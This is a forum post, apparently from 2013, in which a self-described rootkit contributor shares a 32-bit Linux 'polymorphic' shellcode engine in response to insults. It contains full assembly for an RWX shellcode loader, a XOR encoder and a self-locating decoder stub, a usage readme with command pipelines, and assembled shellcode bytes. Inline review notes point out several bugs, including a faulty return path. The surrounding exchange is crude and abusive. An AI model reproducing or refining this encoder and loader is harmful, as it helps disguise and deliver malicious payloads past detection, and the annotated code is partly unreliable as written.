Quote (Faithful @ Mar 20 2013 11:16pm)
I wouldn't take the time to look at your shitty code to figure it out. lol. If you're a somebody, please, show me a live version of your work that you were paid for. If not you're like 99% of nerds that think they are something and never end up being remotely successful. You're a hobbyist. Get over yourself.
Enjoy riding each others dicks, fellas. It's very becoming of you.
what would you like to see. i have plenty of shellcode for 64bit and 32bit linux systems i was paid to write as well as taking part in the jynx2 rootkit as well as other products such as abduction which is an anti software theft module. most of my unpaid work is free to others via blackhatlibrary.net which is currently offline due to the datacenter's raid controller dying.
just as a little teaser here is my 32bit polymorphic shellcode engine i wrote.
loader.s (loads shellcode into memory and jumps to it to test it)
Code
# loader.s -- test harness: copies argv[1] into a fresh anonymous RWX mapping
# and jumps to it.  i386 Linux, GAS AT&T syntax, raw int $0x80 syscalls, no libc.
# Invoked as: ./loader "$(echo -en '\x..\x..')"
#
# Register roles:
#   edi = argv[1] (the NUL-terminated byte string to run)
#   eax = address returned by mmap(), later the jump target
#   esi = copy index; edx = 0 (dl is the NUL comparand); cl = byte scratch
#
# Limitations visible in the code: the payload is taken as a C string, so it
# cannot contain 0x00; argv[1] is never checked for presence (no argument ->
# argv[1] == NULL -> fault in inject_loop); the mmap() return value is used as
# a destination without checking for a -errno in [-4095,-1].
.section .data
.section .text
.global _start
_start:
pop %edi #argc
pop %edi #argv[0]
pop %edi #argv[1]: pointer to the NUL-terminated byte string to run
push $90
pop %eax #eax = 90 = old_mmap: takes ONE pointer (ebx) to a 6-word {addr,len,prot,flags,fd,offset} struct
xor %ebx, %ebx
push %ebx #offset = 0
push %ebx #fd = 0 (Linux ignores fd for MAP_ANONYMOUS; -1 is the portable value)
push $0x22 #flags = MAP_PRIVATE (0x02) | MAP_ANONYMOUS (0x20)
push $0x7 #prot = PROT_READ|PROT_WRITE|PROT_EXEC (this is arg 3, not arg 5); an anonymous RWX mapping is a classic memory-scanner / EDR detection point
push %ebx
pop %ecx
inc %ecx
shl $0x12, %ecx #ecx = 1 << 18 = 0x40000 (256 KiB), not 0x1000 as the original comment claimed
push %ecx #len
push %ebx #addr = NULL (kernel chooses the address)
mov %esp, %ebx #ebx = &struct: the six pushes above form the arg struct in memory order
int $0x80 #eax = mapping address (or -errno, unchecked)
inject:
xor %esi, %esi
push %esi
pop %edx #esi = 0 (index), edx = 0 (dl is the NUL comparand)
inject_loop:
cmpb %dl, (%edi, %esi, 1) #reached the string's terminating NUL?
je inject_finished
movb (%edi, %esi, 1), %cl
movb %cl, (%eax, %esi, 1) #mapping[esi] = argv1[esi]
inc %esi
jmp inject_loop #byte-by-byte strcpy of the payload into the RWX mapping
ret_to_shellcode:
push %eax #push the mapping address and "return" into it; the return address pushed by
ret #the `call` below (address of exit:) stays on the stack for the payload's trailing ret
inject_finished:
inc %esi #NOTE(review): esi already indexes the byte after the payload, so this skip yields [payload][00][c3] (anonymous pages are zero-filled); a payload that falls off its end executes `00 c3` (add %al,%bl) before reaching the ret. Without this inc the ret would follow the payload directly.
movb $0xc3, (%eax, %esi, 1) #append a `ret` so a payload that runs off its end comes back to exit: below
call ret_to_shellcode #pushes the address of exit: as return address, then the stub jumps into the payload
exit:
xor %eax, %eax
mov %eax, %ebx #status = 0
inc %eax #eax = 1 = exit
int $0x80 #exit(0); only reached if the payload returns via the appended ret
encoder.s (takes a bytecode string and encodes it for use in the poly engine.)
Code
# encoder.s -- XOR-encodes argv[1] in place with the one-byte key 0x03 and
# writes the result to fd 2 (stderr).  i386 Linux, GAS AT&T syntax, raw
# int $0x80 syscalls, no libc.  Counterpart of the decoder stub below, which
# XORs each byte with the same key.
#
# Register roles:
#   ecx = argv[1] (buffer; also the write() buffer argument)
#   ebx = byte index while scanning, then 2 (fd) for write()
#   edx = 0 (dl is the NUL comparand), then the byte count for write()
#
# Limitations visible in the code: the input is a C string, so a payload byte
# of 0x00 cannot be passed in, and a payload byte of 0x03 encodes to 0x00
# (which the NUL-terminated copy in loader.s would truncate); a payload byte
# of 0x23 encodes to 0x20, the terminator the decoder stub stops on.
.section .data
.section .text
.global _start
_start:
pop %ecx #argc
pop %ecx #argv[0]
pop %ecx #argv[1]: the bytes to encode, NUL-terminated
xor %ebx, %ebx
push %ebx
pop %edx #ebx = 0 (index), edx = 0 (dl is the NUL comparand)
count_chars:
cmpb %dl, (%ecx, %ebx, 1) #end of string?
je write
xor $0x3, (%ecx, %ebx, 1) #NOTE(review): no size suffix and no register operand, so GAS warns and defaults to a 32-bit xorl (newer binutils may reject it as ambiguous). The imm 0x00000003 only flips the addressed byte, so the encoding is still per-byte, but each iteration reads and rewrites the 3 following bytes (up to 3 past the NUL on the last pass). `xorb $0x3, (%ecx, %ebx, 1)` is what is meant.
inc %ebx
jmp count_chars #ebx ends up as strlen(argv[1]); the buffer is encoded in place
write:
push $4
pop %eax #eax = 4 = write
mov %ebx, %edx #edx = byte count
push $2
pop %ebx #ebx = 2 = stderr (not stdout; the readme's `&> hex` captures it either way)
int $0x80 #write(2, argv[1], len); return value unchecked
exit:
xor %eax, %eax
mov %eax, %ebx #status = 0
inc %eax #eax = 1 = exit
int $0x80 #exit(0)
the decoder.s (to decode the encoded payload and jump to it in memory)
Code
# decoder.s -- self-contained decoder stub: locates itself, mmaps a fresh
# anonymous RWX region, XOR-decodes (key 0x03) the 0x20-terminated encoded
# bytes appended directly after the stub into that region, and jumps to it.
# i386 Linux, GAS AT&T syntax, raw int $0x80 syscalls, no libc.  Run through
# loader.s as: stub bytes + encoded payload + 0x20 (readme steps 5-6).
#
# Layout-sensitive: `add $0x2a, %edx` in start: is the hard-coded byte distance
# from the getpc return point (the mov right after `call getpc`) to the end of
# the stub, where the encoded bytes begin.  As assembled here the stub is
# 86 bytes (jmp 2, inject 33, getpc 4, start 47) and the return point sits at
# offset 44, so 44 + 0x2a = 86.  Any instruction change in this file must be
# mirrored in that constant or the stub decodes from the wrong offset.
.section .data
.section .text
.global _start
_start:
jmp start #skip over the two subroutines (short jump)
# inject: called from start: with the stack holding [ret][encoded start][mmap ptr]
# In:  (%esp)  = return address      -> ecx (then discarded, see below)
#      4(%esp) = encoded bytes start -> ebx
#      8(%esp) = mapping address     -> eax
# Out: does not return normally; ends by `ret`-ing into the decoded payload
inject:
pop %ecx #pop the return address
pop %ebx #pop the encoded shellcode start address
pop %eax #pop the mmaped memory address
xor %edx, %edx
push %edx
pop %ecx #edx = 0 (index); ecx = 0 -- this discards the return address popped above
inject_loop:
cmpb $0x20, (%ebx, %edx, 1) #0x20 marks the end of the encoded bytes
je inject_finished
movb (%ebx, %edx, 1), %cl
xor $0x3, %cl #decode with the same one-byte key encoder.s used
movb %cl, (%eax, %edx, 1) #mapping[edx] = encoded[edx] ^ 0x03
inc %edx
jmp inject_loop
inject_finished:
inc %edx #NOTE(review): as in loader.s, this leaves a zero byte between payload and ret: [payload][00][c3]
movb $0xc3, (%eax, %edx, 1) #append a `ret` after the decoded bytes
push %ecx #NOTE(review): ecx no longer holds the return address (zeroed above, then cl received decoded bytes), so this pushes the last decoded byte (0..255) as the "return" target; a payload that returns through the appended ret jumps to that address and faults. Only a payload that never returns (e.g. exit) works with this stub.
push %eax
ret #jump to the decoded payload
getpc:
mov (%esp), %eax #eax = our return address = address of the instruction after `call getpc`
ret
start:
call getpc #position-independent self-location: eax = address of the `mov %eax, %edx` below
mov %eax, %edx
add $0x2a, %edx #edx = start of the encoded bytes appended after the stub (see layout note in the header)
push $90
pop %eax #eax = 90 = old_mmap: ONE pointer (ebx) to a 6-word {addr,len,prot,flags,fd,offset} struct
xor %ebx, %ebx
push %ebx #offset = 0
push %ebx #fd = 0 (Linux ignores fd for MAP_ANONYMOUS)
push $0x22 #flags = MAP_PRIVATE (0x02) | MAP_ANONYMOUS (0x20)
push $0x7 #prot = PROT_READ|PROT_WRITE|PROT_EXEC: a second anonymous RWX mapping, same detection point as the loader's
push %ebx
pop %ecx
inc %ecx
shl $0x12, %ecx #ecx = 1 << 18 = 0x40000 (256 KiB), not 0x1000 as the original comment claimed
push %ecx #len
push %ebx #addr = NULL
mov %esp, %ebx #ebx = &struct
int $0x80 #eax = mapping address (or -errno, unchecked)
push %eax #arg for inject: mapping address
push %edx #arg for inject: start of the encoded bytes
call inject #does not come back: inject ends with a ret into the decoded payload
exit:
xor %eax, %eax
mov %eax, %ebx #status = 0
inc %eax #eax = 1 = exit
int $0x80 #exit(0); in practice unreachable, since inject discards its return address (see the push %ecx note)
and finally if you need a little readme if you are too dumb to follow along.
Code
usage:
1) create your payload (you can use test_shellcode.s to test)
2) assemble and link your shellcode
as test_shellcode.s -o test_shellcode.o
ld test_shellcode.o -o test_shellcode
3) run this command on your linked shellcode
objdump -d test_shellcode | grep 8048 | grep -v ">:" | cut -f2 | perl -p -e 's/ [ \n]*/\\x/g'
output: 31\xc0\x40\x89\xc3\xcd\x80\x
fix output: \x31\xc0\x40\x89\xc3\xcd\x80
4) run shellcode through encoder
./encoder "$(echo -en "\x31\xc0\x40\x6a\x42\x5b\xcd\x80")" &> hex; cat hex |hexdump -C |sed 's/^[0-9a-f]........//g' |sed 's/|.*|$//g' |sed 's/ / /g' |sed 's/ /\\x/g' |sed 's/\\x\\x//g' |sed 's/\\x$//g' |grep x |awk '{printf("%s ", $0)}' |sed 's/ //g'
output: \x32\xc3\x43\x69\x41\x58\xce\x83
5) affix encoded shellcode to end of decoder stub and append \x20 terminator (can be obtained via code in step 3 just replace test_shellcode with decoder binary)
output: \xeb\x25\x59\x5b\x58\x31\xd2\x52\x59\x80\x3c\x13\x20\x74\x0c\x8a\x0c\x13\x80\xf1\x03\x88\x0c\x10\x42\xeb\xee\x42\xc6\x04\x10\xc3\x51\x50\xc3\x8b\x04\x24\xc3\xe8\xf7\xff\xff\xff\x89\xc2\x83\xc2\x2a\x6a\x5a\x58\x31\xdb\x53\x53\x6a\x22\x6a\x07\x53\x59\x41\xc1\xe1\x12\x51\x53\x89\xe3\xcd\x80\x50\x52\xe8\xb3\xff\xff\xff\x31\xc0\x50\x5b\x40\xcd\x80\x32\xc3\x43\x69\x41\x58\xce\x83\x20
6) test payload with loader
./loader "$(echo -en "\xeb\x25\x59\x5b\x58\x31\xd2\x52\x59\x80\x3c\x13\x20\x74\x0c\x8a\x0c\x13\x80\xf1\x03\x88\x0c\x10\x42\xeb\xee\x42\xc6\x04\x10\xc3\x51\x50\xc3\x8b\x04\x24\xc3\xe8\xf7\xff\xff\xff\x89\xc2\x83\xc2\x2a\x6a\x5a\x58\x31\xdb\x53\x53\x6a\x22\x6a\x07\x53\x59\x41\xc1\xe1\x12\x51\x53\x89\xe3\xcd\x80\x50\x52\xe8\xb3\xff\xff\xff\x31\xc0\x50\x5b\x40\xcd\x80\x32\xc3\x43\x69\x41\x58\xce\x83\x20")"; echo $?
output: 66
This post was edited by AbDuCt on Mar 20 2013 09:26pm